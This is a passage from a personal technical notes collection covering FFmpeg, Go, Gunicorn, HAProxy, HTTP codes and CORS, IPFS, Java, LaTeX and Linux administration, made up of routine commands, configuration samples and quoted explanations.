-t N        encode only N seconds of video (you can also use the hh:mm:ss.ddd format)
-croptop, -cropleft, -cropright, -cropbottom    crop input video frame on each side
-y          automatic overwrite of the output file
-ss         select the starting time in the source file
-vol        change the volume of the audio
-g          Gop size (distance between keyframes)
-b          Video bitrate
-bt         Video bitrate tolerance
-metadata   add a key=value metadata

18.1.2 Compile

Compile FFMPEG Requirement libraries:

$ aptitude install libfdk-aac-dev \
    libmp3lame-dev \
    libtheora-dev \
    libvorbis-dev \
    libvpx-dev \
    libx264-dev

You can also download libfdk_aac from http://sourceforge.net/projects/opencore-amr/?source=dlp and compile it:

$ ./configure
$ make
$ make install

Then download ffmpeg from http://www.ffmpeg.org/download.html#releases

$ ./configure --enable-gpl --enable-nonfree \
    --enable-libmp3lame \
    --enable-libfdk_aac \
    --enable-libvorbis \
    --enable-libtheora \
    --enable-libx264 \
    --enable-libvpx
$ make
$ make install

FFmpeg Static Builds

http://johnvansickle.com/ffmpeg/ http://ffmpeg.gusari.org/static/

18.1.3 Links https://sonnati.wordpress.com/2011/07/11/ffmpeg-the-swiss-army-knife-of-internet-streaming-part-i/

FFmpeg on Windows http://ffmpeg.zeranoe.com/


18.1.4 How to Watermark an image into the video

# Top left
$ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark] overlay=10:10 [out]" output.flv

# Top right
$ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark] overlay=main_w-overlay_w-10:10 [out]" output.flv

# Bottom left
$ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark] overlay=10:main_h-overlay_h-10 [out]" output.flv

# Bottom right
$ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark] overlay=main_w-overlay_w-10:main_h-overlay_h-10 [out]" output.flv

# Center
$ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark] overlay=main_w/2-overlay_w/2:main_h/2-overlay_h/2 [out]" output.flv

http://www.digitalwhores.net/ffmpeg/ffmpeg-watermark-positions/

Burn subtitles into video

$ ffmpeg -i video.avi -vf subtitles=subtitle.srt out.avi

https://trac.ffmpeg.org/wiki/HowToBurnSubtitlesIntoVideo

Reduce the size of a video

$ ffmpeg -i input.mp4 -r 30 -s 960x540 output.mp4

GUI Video editor

$ apt-get install kdenlive

Convert an animated gif to an mp4 file

$ ffmpeg -i input.gif -movflags faststart -pix_fmt yuv420p -vf "scale=trunc(iw/2)*2:trunc(ih/2)*2" output.mp4

• movflags – This option optimizes the structure of the MP4 file so the browser can load it as quickly as possible.
• pix_fmt – MP4 videos store pixels in different formats. We include this option to specify a specific format which has maximum compatibility across all browsers.
• vf – MP4 videos using H.264 need to have dimensions that are divisible by 2. This option ensures that's the case.


$ ffmpeg -f gif -i input.gif output.mp4

https://unix.stackexchange.com/a/294892

Extract screen shot for a video at a given time

$ ffmpeg -ss 00:00:03 -i input.mp4 -vframes 1 -q:v 2 output.jpg

https://stackoverflow.com/a/27573049

CHAPTER 19

Game

Contents:

19.1 Game

19.1.1 bzflag

$ sudo apt-get install bzflag
$ bzfs -i 192.168.1.40 -p 5000 +f good
$ bzfs -i 192.168.1.40 -p 5000 +f good -cr -j -ms 5 +r

https://wiki.bzflag.org/BZFS_Command_Line_Options
https://wiki.bzflag.org/Sample_conf
https://wiki.bzflag.org/Creating_a_server


CHAPTER 20

Go-Lang

Contents:

20.1 Tips

20.1.1 Builtin function http://golang.org/pkg/builtin/

20.1.2 Introduction to go programming language

Define slice

package main

import "fmt"

func main() {

    var slice_1 []int
    slice_2 := []int{}
    slice_3 := make([]int, 0)

    var slice_4 = []int{1, 2, 3, 4}
    slice_5 := []int{1, 2, 3, 4}

    slice_6 := make([]int, 0)
    slice_6 = append(slice_6, 1, 2, 3, 4)

    slice_7 := slice_4[:]
    slice_8 := slice_5[0:4]

    slice_9 := make([]int, 4) // [0 0 0 0]
    copy(slice_9, slice_4)

    fmt.Println(slice_1, slice_2, slice_3, slice_4, slice_5, slice_6, slice_7, slice_8, slice_9)
}
// [] [] [] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4] [1 2 3 4]

Notes:

• The first argument of the make, append and copy functions must be a slice.
• The second argument of the copy function must also be a slice. (As a special case, it will also copy bytes from a string to a slice of bytes.)
• The copy function returns the number of elements copied, which will be the minimum of len(src) and len(dst).

package main

import "fmt"

func main() {

    slice_1 := []int{1, 2, 3, 4, 5}
    slice_2 := []int{11, 22}
    slice_3 := []int{111}
    slice_4 := []int{}

    count := copy(slice_1, slice_2)
    fmt.Println(count, slice_1)

    count = copy(slice_3, slice_2)
    fmt.Println(count, slice_3)

    count = copy(slice_4, slice_2)
    fmt.Println(count, slice_4)
}
// 2 [11 22 3 4 5]
// 1 [11]
// 0 []

20.1.3 SET the GOPATH and GOROOT environments

$ export GOROOT=/usr/lib/go
$ export GOPATH=$HOME/go
$ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

https://stackoverflow.com/a/43553857

CHAPTER 21

Gunicorn

Contents:

21.1 Tips

21.1.1 Install Gunicorn

$ pip install gunicorn
# or
$ sudo apt-get install -y gunicorn

21.1.2 Gunicorn config settings http://docs.gunicorn.org/en/stable/settings.html

21.1.3 How Many Workers?

DO NOT scale the number of workers to the number of clients you expect to have. Gunicorn should only need 4-12 worker processes to handle hundreds or thousands of requests per second. Gunicorn relies on the operating system to provide all of the load balancing when handling requests. Generally we recommend (2 x $num_cores) + 1 as the number of workers to start off with. While not overly scientific, the formula is based on the assumption that for a given core, one worker will be reading or writing from the socket while the other worker is processing a request. Obviously, your particular hardware and application are going to affect the optimal number of workers.


Our recommendation is to start with the above guess and tune using TTIN and TTOU signals while the application is under load. Always remember, there is such a thing as too many workers. After a point your worker processes will start thrashing system resources decreasing the throughput of the entire system. http://docs.gunicorn.org/en/latest/design.html#how-many-workers
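As a rough sketch of that rule of thumb (plain Python, nothing gunicorn-specific):

import multiprocessing

# (2 x $num_cores) + 1, e.g. 9 workers on a 4-core machine
workers = multiprocessing.cpu_count() * 2 + 1
print(workers)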

21.1.4 Choosing a Worker Type

The default synchronous workers assume that your application is resource-bound in terms of CPU and network bandwidth. Generally this means that your application shouldn't do anything that takes an undefined amount of time. For instance, a request to the internet meets this criterion. At some point the external network will fail in such a way that clients will pile up on your servers.
This resource-bound assumption is why we require a buffering proxy in front of a default configuration Gunicorn. If you exposed synchronous workers to the internet, a DOS attack would be trivial by creating a load that trickles data to the servers. For the curious, Boom is an example of this type of load.
Some examples of behavior requiring asynchronous workers:
• Applications making long blocking calls (i.e., external web services)
• Serving requests directly to the internet
• Streaming requests and responses
• Long polling
• Web sockets
• Comet
http://docs.gunicorn.org/en/latest/design.html#choosing-a-worker-type
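For example, switching to an asynchronous worker class is only a flag change; myapp.wsgi below is a placeholder module and gevent must be installed first:

$ pip install gevent
$ gunicorn myapp.wsgi:application --worker-class gevent --workers 4 --bind 0.0.0.0:8000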

21.1.5 Worker Processes http://docs.gunicorn.org/en/develop/configure.html#worker-processes

21.1.6 Running Django with Gunicorn - Best Practice http://stackoverflow.com/questions/16857955/running-django-with-gunicorn-best-practice https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/gunicorn/#running-django-in-gunicorn-as-a-generic-wsgi-application http://docs.gunicorn.org/en/0.17.2/deploy.html http://docs.gunicorn.org/en/0.17.2/run.html


21.1.7 Can’t get access log to work for gunicorn http://docs.gunicorn.org/en/stable/settings.html#logging http://stackoverflow.com/questions/13472842/cant-get-access-log-to-work-for-gunicorn

$ gunicorn web_app.wsgi:application --bind 192.168.1.119:8001 --workers 3 --access-logfile -

21.1.8 Serving a gunicorn app with PyInstaller

from gunicorn.app.base import Application, Config
import gunicorn
from gunicorn import glogging
from gunicorn.workers import sync


class GUnicornFlaskApplication(Application):
    def __init__(self, app):
        self.usage, self.callable, self.prog, self.app = None, None, None, app

    def run(self, **options):
        self.cfg = Config()
        [self.cfg.set(key, value) for key, value in options.items()]
        return Application.run(self)

    load = lambda self: self.app


def app(environ, start_response):
    data = "Hello, World!\n"
    start_response("200 OK", [
        ("Content-Type", "text/plain"),
        ("Content-Length", str(len(data)))
    ])
    return iter(data)


if __name__ == "__main__":
    gunicorn_app = GUnicornFlaskApplication(app)
    gunicorn_app.run(
        worker_class="gunicorn.workers.sync.SyncWorker",
    )

https://github.com/benoitc/gunicorn/issues/669#issuecomment-31217831

21.1.9 Serving a pycnic app with gunicorn with PyInstaller

import gunicorn
from gunicorn.six import iteritems
from pycnic.core import WSGI, Handler
from gunicorn.app.base import Application
from gunicorn.glogging import Logger  # needed by pyinstaller
from gunicorn.workers import sync  # needed by pyinstaller


class Hello(Handler):
    def get(self, name="World"):
        return {"message": "Hello, %s!" % (name)}


class app(WSGI):
    routes = [
        ('/', Hello()),
        ('/([\w]+)', Hello())
    ]


class StandaloneApplication(gunicorn.app.base.BaseApplication):
    def __init__(self, app, options=None):
        self.options = options or {}
        self.application = app
        super(StandaloneApplication, self).__init__()

    def load_config(self):
        config = dict([(key, value) for key, value in iteritems(self.options)
                       if key in self.cfg.settings and value is not None])
        for key, value in iteritems(config):
            self.cfg.set(key.lower(), value)

    def load(self):
        return self.application


StandaloneApplication(app, {}).run()

http://docs.gunicorn.org/en/stable/custom.html
http://pycnic.nullism.com/docs/getting-started.html#hosting-with-gunicorn

CHAPTER 22

HAPROXY

Contents:

22.1 Tips

22.1.1 Haproxy with docker

$ docker pull haproxy
$ docker run --rm -p 80:80 -p 9000:9000 -v ~/workspace/haproxy/haproxy.cfg:/usr/local/etc/haproxy/haproxy.cfg:ro haproxy

haproxy.cfg:

global
    maxconn 1024
    daemon

defaults
    log global
    mode http
    option httplog
    option dontlognull
    timeout connect 5000
    timeout client 50000
    timeout server 50000

frontend www-http
    bind *:80
    default_backend web

backend web
    mode http
    balance roundrobin
    option forwardfor
    http-request set-header X-Forwarded-Port %[dst_port]
    http-request add-header X-Forwarded-Proto https if { ssl_fc }
    option httpchk HEAD / HTTP/1.1\r\nHost:localhost
    server web_01 192.168.1.119:8000 check
    server web_02 192.168.1.119:8001 check

listen status
    bind *:9000
    stats enable
    stats uri /
    stats hide-version
    stats auth admin:admin

The log directive mentions a syslog server to which log messages will be sent. On Ubuntu rsyslog is already installed and running but it doesn't listen on any IP address. We'll modify the config files of rsyslog later.

The maxconn directive specifies the number of concurrent connections on the frontend. The default value is 2000 and should be tuned according to your VPS' configuration.

The connect option specifies the maximum time to wait for a connection attempt to a VPS to succeed. The client and server timeouts apply when the client or server is expected to acknowledge or send data during the TCP process. HAProxy recommends setting the client and server timeouts to the same value.

The retries directive sets the number of retries to perform on a VPS after a connection failure.

The option redispatch enables session redistribution in case of connection failures, so session stickiness is overridden if a VPS goes down.

timeout http-request: the time from the first client byte received until the last byte sent to the client (regardless of keep alive). So if your backend is too slow or the client is sending its request too slowly, the whole communication might take longer than this, and the request is dropped (and a timeout sent to the client).

timeout http-keep-alive: the time to keep a connection open between haproxy and the client (after the client response is sent out). This has nothing to do with the backend response time. This has nothing to do with the length of a single request (i.e. the http-request timeout). This allows faster responses if the user requests multiple resources (i.e. html, img, and js). With keep alive the single requests can make use of the same tcp connection. This way the load time for a full webpage is reduced.

timeout server: this is the timeout for your backend servers. When reached, haproxy replies with 504 (gateway timeout). This also has nothing to do with keep alive, as it is only about the connection between the proxy and the backend.

https://cbonte.github.io/haproxy-dconv/configuration-1.5.html
https://www.digitalocean.com/community/tutorials/how-to-use-haproxy-to-set-up-http-load-balancing-on-an-ubuntu-vps
https://cbonte.github.io/haproxy-dconv/configuration-1.5.html#max-spread-checks
http://serverfault.com/questions/647060/haproxy-timeout-http-request-vs-timeout-http-keep-alive-vs-timeout-server
http://www.slideshare.net/haproxytech/haproxy-best-practice


http://stackoverflow.com/questions/8750518/difference-between-global-maxconn-and-server-maxconn-haproxy
http://stackoverflow.com/questions/28162452/how-to-make-ha-proxy-keepalive
http://killtheradio.net/technology/haproxys-keep-alive-functionality-and-how-it-can-speed-up-your-site/
https://github.com/postrank-labs/goliath/wiki/HAProxy
https://www.digitalocean.com/community/tutorials/an-introduction-to-haproxy-and-load-balancing-concepts
http://neo4j.com/docs/stable/ha-haproxy.html
https://serversforhackers.com/load-balancing-with-haproxy
https://www.datadoghq.com/blog/monitoring-haproxy-performance-metrics/

On multi-core systems this setup can however cause problems, as HAproxy is single-threaded - especially on virtual servers like Amazon EC2 and others that give their users many low-power CPU cores where per-core performance does not increase - when you buy a faster instance you actually get more cores - and in the case of Amazon this is a fixed value of 3.25 ECU per core (for m3 instances). This of course means that HAproxy will have similar performance no matter how big an instance is selected.

Since version 1.5-dev13 HAproxy offers to split processes and map them to CPU cores. There are 2 options that need to be set: nbproc and cpu-map. To be accurate, nbproc is not a new option, it was in 1.4 as well, but now you have control over which core is doing what. Here is an example of a simple configuration for a system with 4 cores:

global
    nbproc 4
    cpu-map 1 0
    cpu-map 2 1
    cpu-map 3 2
    cpu-map 4 3

The first number is the process, starting with "1", and the second is the CPU core, starting with "0". The above setup will cause haproxy to spread load on all 4 cores equally. But this is just a beginning. You can dedicate only some cores to perform specified operations; for example, for HTTP traffic you would use only 1 dedicated core while the 3 other cores can do HTTPS. Just add the bind-process directive:

frontend access_http
    bind 0.0.0.0:80
    bind-process 1

frontend access_https
    bind 0.0.0.0:443 ssl crt /etc/yourdomain.pem
    bind-process 2 3 4

You can even separate CPU cores for backend processing.

http://blog.onefellow.com/post/82478335338/haproxy-mapping-process-to-cpu-core-for-maximum
http://cbonte.github.io/haproxy-dconv/configuration-1.6.html?keyword=nbproc#nbproc
http://cbonte.github.io/haproxy-dconv/configuration-1.6.html?keyword=nbproc#cpu-map

22.1.2 Dynamic Backend

https://news.ycombinator.com/item?id=5222209
https://github.com/PearsonEducation/thalassa-aqueduct

Hot reconfiguration

http://www.haproxy.org/download/1.2/doc/haproxy-en.txt
http://comments.gmane.org/gmane.comp.web.haproxy/10565
https://github.com/thisismitch/doproxy
http://alex.cloudware.it/2011/10/simple-auto-scale-with-haproxy.html
https://www.digitalocean.com/community/tutorials/how-to-automate-the-scaling-of-your-web-application-on-digitalocean

https://tech.shareaholic.com/2012/10/26/haproxy-a-substitute-for-amazon-elb/
http://michalf.me/blog:haproxy

CHAPTER 23

HTTP

Contents:

23.1 Tips

23.1.1 HTTP persistent connection

HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using a single TCP connection to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair. The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection. https://en.wikipedia.org/wiki/HTTP_persistent_connection
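A small sketch of keep-alive from the client side with the Python requests library (the host and paths are placeholders); a Session reuses the same TCP connection for consecutive requests to one host instead of reconnecting each time:

import requests

session = requests.Session()
for path in ("/", "/about", "/contact"):
    # all three requests go over the same pooled connection
    response = session.get("http://example.com" + path)
    print(path, response.status_code)
session.close()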

23.2 HTTP access control (CORS)

How does Access-Control-Allow-Origin header work? Site B uses Access-Control-Allow-Origin to tell the browser that the content of this page is accessible to certain domains. By default, site B’s pages are not accessible to any other domain; using the ACAO header opens a door for cross-domain access by specific domains. Site B should serve its pages with: Access-Control-Allow-Origin: http://sitea.com Modern browsers will not block cross-domain requests outright. If site A requests a page from site B, the browser will actually fetch the requested page on the network level and check if the response headers list site A as a permitted requester domain. If site B has not indicated that site A is allowed to access this page, the browser will send an error and decide not to provide the response to the requesting JavaScript code. EDIT: What happens on the network level is actually slightly more complex than I suggest here; there is sometimes a data-less “preflight” request when using special headers or HTTP verbs other than GET and POST (e.g. PUT, DELETE). See my answer on Understanding XMLHttpRequest over CORS for more details.

http://stackoverflow.com/a/10636765

Understanding XMLHttpRequest over CORS (responseText)

For a "simple" HTTP verb like GET or POST, yes, the entire page is fetched, and then the browser decides whether JavaScript gets to use the contents or not. The server doesn't need to know where the request comes from; it is the browser's job to inspect the reply from the server and determine if JS is permitted to see the contents.

For a "non-simple" HTTP verb like PUT or DELETE, the browser issues a "preflight request" using an OPTIONS request. In that case, the browser first checks to see if the domain and the verb are supported, by checking for Access-Control-Allow-Origin and Access-Control-Allow-Methods, respectively. (See "Handling a Not-So-Simple Request" on the CORS page of HTML5 Rocks for more information.) The preflight response also lists permissible non-simple headers, included in Access-Control-Allow-Headers.

This is because allowing a client to send a DELETE request to the server could be very bad, even if JavaScript never gets to see the cross-domain result; again, remember that the server is generally not under any obligation to verify that the request is coming from a legitimate domain (although it may do so using the Origin header from the request).

http://stackoverflow.com/a/13400954/710446
https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS
http://www.html5rocks.com/en/tutorials/cors/
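On the server side, the header is simply set on the response; a minimal sketch as a Django middleware (the allowed origin http://sitea.com follows the example above, and the class still has to be added to MIDDLEWARE in settings):

class CorsMiddleware(object):
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        response = self.get_response(request)
        # allow pages served from sitea.com to read this response
        response['Access-Control-Allow-Origin'] = 'http://sitea.com'
        return response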

23.3 HTTP Codes

23.3.1 204 No Content

The 204 status code means that the request was received and understood, but that there is no need to send any data back.

23.3.2 301 Moved permanently

Your Web server thinks that your URL has been permanently redirected to another URL. The client system is expected to immediately retry the alternate URL.

23.3.3 302 Moved temporarily

Your Web server thinks that your URL has been temporarily redirected to another URL. The client system is expected to immediately retry the alternate URL.

23.3.4 304 Not Modified

This does not really indicate an error, but rather indicates that the resource for the requested URL has not changed since last accessed or cached.

23.3.5 410 HTTP Error Gone

A 410 status code is returned if the new address is altogether unavailable or the server admin does not want to reveal it. Upon receiving a 410 status code, the client should not request the resource again in the future. Clients such as search engines should remove the resource from their indexes.


The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 Not Found SHOULD be used instead.

23.3.6 500 Internal server error

The Web server (running the Web Site) encountered an unexpected condition that prevented it from fulfilling the request by the client (e.g. your Web browser or our CheckUpDown robot) for access to the requested URL. This is a ‘catch-all’ error generated by the Web server. Basically something has gone wrong, but the server can not be more specific about the error condition in its response to the client. In addition to the 500 error notified back to the client, the Web server should generate some kind of internal error log which gives more details of what went wrong. It is up to the operators of the Web server site to locate and analyse these logs.

23.3.7 502 Bad Gateway

A server (not necessarily a Web server) is acting as a gateway or proxy to fulfil the request by the client (e.g. your Web browser) to access the requested URL. This server received an invalid response from an upstream server it accessed to fulfil the request.
This usually does not mean that the upstream server is down (no response to the gateway/proxy), but rather that the upstream server and the gateway/proxy do not agree on the protocol for exchanging data. Given that Internet protocols are quite clear, it often means that one or both machines have been incorrectly or incompletely programmed.

23.3.8 504 Gateway Timeout

504 Gateway Timeout is a server error code returned by a server acting as a proxy or gateway. It typically means the proxy did not receive an adequate response in time from an upstream server specified in the URL, such as an LDAP, FTP, HTTP, or other auxiliary server that it needs to access in order to finish the request being made of it.

23.3.9 509 Bandwidth Limit Exceeded

This status code, while used by many servers, is not specified in any RFCs.


CHAPTER 24

IP Tables

Contents:

24.1 Tips

24.1.1 Open one port

$ sudo iptables -I INPUT -p tcp -s 0.0.0.0/0 --dport 8000 -j ACCEPT


CHAPTER 25

InterPlanetary File System (IPFS)

Contents:

25.1 Tips

25.1.1 Public IPFS Gateways https://ipfs.github.io/public-gateway-checker/

25.1.2 Docker usage

$ export ipfs_staging=</absolute/path/to/staging_dir>
$ export ipfs_data=</absolute/path/to/data_dir>
$ docker run -d --name ipfs_host -v $ipfs_staging:/export -v $ipfs_data:/data/ipfs -p 4001:4001 -p 127.0.0.1:8080:8080 -p 127.0.0.1:5001:5001 ipfs/go-ipfs:latest

Watch log and Wait for ipfs to start:

$ docker logs -f ipfs_host

The ipfs is running when you see this on the log:

Gateway(readonly) server listening on /ip4/0.0.0.0/tcp/8080

Connect to peers:

$ docker exec ipfs_host ipfs swarm peers

Add files:


$ cp -r <file_or_dir_to_add> $ipfs_staging
$ docker exec ipfs_host ipfs add -r /export/<file_or_dir_to_add>

https://github.com/ipfs/go-ipfs#docker-usage

25.1.3 Python usage

$ pip install ipfsapi

import ipfsapi

api = ipfsapi.connect('127.0.0.1', 5001)
res = api.add('test.txt')
res
{'Hash': 'QmWxS5aNTFEc9XbMX1ASvLET1zrqEaTssqt33rVZQCQb22', 'Name': 'test.txt'}
api.cat(res['Hash'])
'fdsafkljdskafjaksdjf\n'
api.id()
{'Addresses': ['/ip4/127.0.0.1/tcp/4001/ipfs/QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS',
               '/ip6/::1/tcp/4001/ipfs/QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS'],
 'AgentVersion': 'go-ipfs/0.4.10',
 'ID': 'QmS2C4MjZsv2iP1UDMMLCYqJ4WeJw8n3vXx1VKxW1UbqHS',
 'ProtocolVersion': 'ipfs/0.1.0',
 'PublicKey': 'CAASpgIwgg ... 3FcjAgMBAAE='}

https://github.com/ipfs/py-ipfs-api#usage

CHAPTER 26

IRC

Contents:

26.1 Tips

/msg nickserv info Jerry
/whois NickName
/nick NICKNAME
/msg nickserv register [YOUR PASSWORD] [YOUR EMAIL]
/join surena


CHAPTER 27

Java

Contents:

27.1 Tips

(JDK) Java Development Kit
(JRE) Java Runtime Environment
Standard Edition (JavaSE)
Enterprise Edition (JavaEE, also known as J2EE)
Mobile Edition (JavaME)

27.1.1 How to install Oracle Java

Download and extract Oracle JDK to the /opt/jdk like path, and then:

$ sudo update-alternatives --install /usr/bin/java java /opt/jdk/jre/bin/java 2000
$ sudo update-alternatives --install /usr/bin/javac javac /opt/jdk/bin/javac 2000

27.1.2 Install Java on ubuntu

$ apt-get install default-jre

This will install the Java Runtime Environment (JRE). If you instead need the Java Development Kit (JDK), which is usually needed to compile Java applications (for example Apache Ant, Apache Maven, Eclipse and IntelliJ IDEA), execute the following command:

$ apt-get install default-jdk https://www.digitalocean.com/community/tutorials/how-to-install-java-on-ubuntu-with-apt-get


27.1.3 Switch between installed java

Configures the default for the program “java”. That’s the Java VM

$ sudo update-alternatives --config java

Configures the default Java compiler

$ sudo update-alternatives --config javac

27.2 Introduction to java programming language

$ javac HelloWorld.java
$ java -cp . HelloWorld

$ javac -d . SimpleExample.java
$ java -cp . com.mynotes.examples.SimpleExample

With the java command, the -cp (class path) option is used to designate where the command should seek out the specified class(es). In this example, '.' is used to designate that the root directory for the classes is the current local directory.
Note the use of the -d parameter with the javac command, which tells the compiler that the destination of the compiled class (SimpleExample) and its directory structure's root is the local directory in which the Java file is located. What this means is that a directory named com will be created. Within this com directory, an examples directory is placed, and within examples, SimpleExample.class is generated.
http://www.sergiy.ca/how-to-compile-and-launch-java-code-from-command-line/
Package names are all lowercase. Packages in the Java language begin with "java" or "javax". Generally, companies use their Internet domain in reverse order (so a company like oreilly.com would become com.oreilly, nonprofit.org would become org.nonprofit, etc.). If the domain contains some special characters (nonalphanumeric) or conflicts with a reserved Java keyword, it is either not used or an underscore (_) is used instead.

27.2.1 In Java, what's the difference between public, default, protected, and private?

http://stackoverflow.com/questions/215497/in-java-whats-the-difference-between-public-default-protected-and-private

Public members are accessible from everywhere.
Protected members are accessible by the classes of the same package and the subclasses residing in any package.
Default members are accessible by the classes of the same package.
Private members are accessible within the same class only.

27.2.2 When should I use “this” in a class? http://stackoverflow.com/questions/2411270/when-should-i-use-this-in-a-class


27.2.3 Understanding constructors http://www.javaworld.com/article/2076204/core-java/understanding-constructors.html http://www.javabeginner.com/learn-java/java-constructors


CHAPTER 28

Java Script

Contents:

28.1 Tips

Best JavaScript compressor
http://stackoverflow.com/questions/28932/best-javascript-compressor
http://documentcloud.github.io/jammit/

Best Practices for Speeding Up Your Web Site
http://developer.yahoo.com/performance/rules.html

Minimize round-trip times
https://developers.google.com/speed/docs/best-practices/rtt?csw=1#MinimizeDNSLookups

28.1.1 Installing Bower

$ sudo npm install -g bower
$ sudo ln -s /usr/bin/nodejs /usr/bin/node

https://bower.io/
http://stackoverflow.com/a/22791301

28.2 ExtJS

28.2.1 Sencha Cmd

Upgrading Sencha Cmd


$ sencha upgrade --check
$ sencha upgrade

$ sencha upgrade --check --beta
$ sencha upgrade --beta

Generating Your Application

$ sencha -sdk /path/to/sdk generate app MyApp /path/to/MyApp
$ sencha -sdk /home/omidraha/Tools/js/Sencha/Sencha\ Ext\ JS/ext-4.2.1.883/ generate app hello /home/omidraha/Prj/Sencha/ExtJS/hello

Building Your Application

$ sencha app build

Generating a Workspace

$ sencha generate workspace /path/to/workspace

Generating Pages

$ sencha -sdk /path/to/ext generate app ExtApp /path/to/workspace/extApp
$ sencha -sdk /path/to/touch generate app TouchApp /path/to/workspace/touchApp

Generate Local Packages

sencha generate package -type code foo

Then add “common” as a requirement to your application’s “app.json”:

{ "name": "MyApp", "requires":[ "foo" ] }

Building The Package

$ sencha package build

CHAPTER 29

Latex

Contents:

29.1 Tips

$ sudo apt-get install texlive-xetex $ sudo apt-get install texlive-lang-arabic

29.1.1 Write Persian in Latex

Use bidi package and RTL :

\documentclass[12pt,a4paper,oneside]{report}

\usepackage[utf8]{inputenc}
\usepackage{fontspec}
\setmainfont{B Nazanin}
\usepackage{bidi}
\RTL
\begin{document}
\textbf{!}
!
\end{document}

Use xepersian package:

\documentclass[12pt,a4paper,oneside]{report}

\usepackage[utf8]{inputenc}
\usepackage{fontspec}
\usepackage{xepersian}
\settextfont{B Nazanin}
\setlatintextfont{Lato Thin}

\begin{document}
\textbf{!}
!
\end{document}

Generate pdf file:

$ xelatex sample.tex

CHAPTER 30

Linux

Contents:

30.1 Cmds

30.1.1 Add User

$ sudo adduser <username>

30.1.2 Delete a User

$ sudo deluser <username>
$ sudo userdel <username>

If, instead, you want to delete the user’s home directory when the user is deleted, you can issue the following command as root:

$ sudo deluser --remove-home <username>
$ sudo deluser -r <username>
$ sudo userdel -r <username>

30.1.3 Changing User Password

$ sudo passwd <username>


30.1.4 Allowing other users to run sudo

$ sudo adduser <username> sudo
$ sudo visudo
# $ vim /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL
or      ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

http://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line
https://help.ubuntu.com/community/RootSudo#Allowing_other_users_to_run_sudo

30.1.5 Delete a user from one group

$ groupdel group http://www.computerhope.com/unix/groupdel.htm

30.1.6 Remove sudo privileges from a user (without deleting the user)

$ sudo deluser username sudo http://askubuntu.com/a/335989

30.1.7 Users and Groups name list getent passwd | awk -F':' '{ print $1}' getent passwd | awk -F: '{print $1}'| while read name; do groups $name; done kuser(KDE User Manager)

30.1.8 apt-file search

ERROR: cmake/modules/FindKDE4Internal.cmake not found

$ apt-file search FindKDE4Internal.cmake
kdelibs5-dev: /usr/share/kde4/apps/cmake/modules/FindKDE4Internal.cmake

30.1.9 mtu ifconfig eth0 mtu 1400 # 1360, 1406 or 1407 , default is 1500

30.1.10 dpkg-reconfigure


dpkg-reconfigure kdm
dpkg-reconfigure gdm

30.1.11 rfkill

# ifconfig wlan0 up SIOCSIFFLAGS: Operation not possible due to RF-kill

# rfkill list 0: phy0: Wireless LAN Soft blocked: yes Hard blocked: no

# rfkill unblock 0

# rfkill list 0: phy0: Wireless LAN Soft blocked: no Hard blocked: no

# ifconfig wlan0 up

30.1.12 Run wireshark with capture packets privilege

http://wiki.wireshark.org/CaptureSetup/CapturePrivileges

setcap 'CAP_NET_RAW+eip CAP_NET_ADMIN+eip' /usr/bin/dumpcap
groupadd wireshark
usermod -a -G wireshark omidraha
chgrp wireshark /usr/bin/dumpcap
chmod 4750 /usr/bin/dumpcap
dpkg-reconfigure wireshark-common

Configuring wireshark-common

Dumpcap can be installed in a way that allows members of the "wireshark" system group to capture packets.
This is recommended over the alternative of running Wireshark/Tshark directly as root, because less of the
code will run with elevated privileges.

For more detailed information please see /usr/share/doc/wireshark-common/README.Debian.

Enabling this feature may be a security risk, so it is disabled by default. If in doubt, it is suggested
to leave it disabled.

Should non-superusers be able to capture packets?

30.1.13 Install, Remove, Purge and get Info of Packages

To install package:
dpkg -i package-file-name

To remove (uninstall) package:
dpkg -r package-file-name

To purge package:
dpkg -P package-file-name

To get info of package:
dpkg -l | grep 'package-file-name'

30.1.14 Create A Local Debian Mirror With apt-mirror

http://www.howtoforge.com/local_debian_ubuntu_mirror

apt-get install apt-mirror
vim /etc/apt/mirror.list

set base_path /mnt/sdc1/OR/apt-mirror
# set mirror_path $base_path/mirror
# set skel_path $base_path/skel
# set var_path $base_path/var
# set cleanscript $var_path/clean.sh
# set defaultarch
# set postmirror_script $var_path/postmirror.sh
# set run_postmirror 0
set nthreads 20
set _tilde 0

deb http://172.16.1.210/repo/debian testing main contrib non-free          # 32 bit
deb-amd64 http://172.16.1.210/repo/debian testing main contrib non-free    # 64 bit

# set cleanscript $var_path/clean.sh
clean http://172.16.1.210/repo/debian

su - apt-mirror -c apt-mirror

/mnt/sdc1/OR/apt-mirror/var/clean.sh

30.1.15 Named pipe

In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in Microsoft Windows, although the semantics differ substantially. A traditional pipe is "unnamed" because it exists anonymously and persists only for as long as the process is running. A named pipe is system-persistent and exists beyond the life of the process; it must be deleted once it is no longer being used. Processes generally attach to the named pipe (usually appearing as a file) to perform inter-process communication. Instead of a conventional, unnamed shell pipeline, a named pipeline makes use of the filesystem. It is explicitly created using mkfifo() or mknod(), and two separate processes can access the pipe by name: one process can open it as a reader, and the other as a writer.

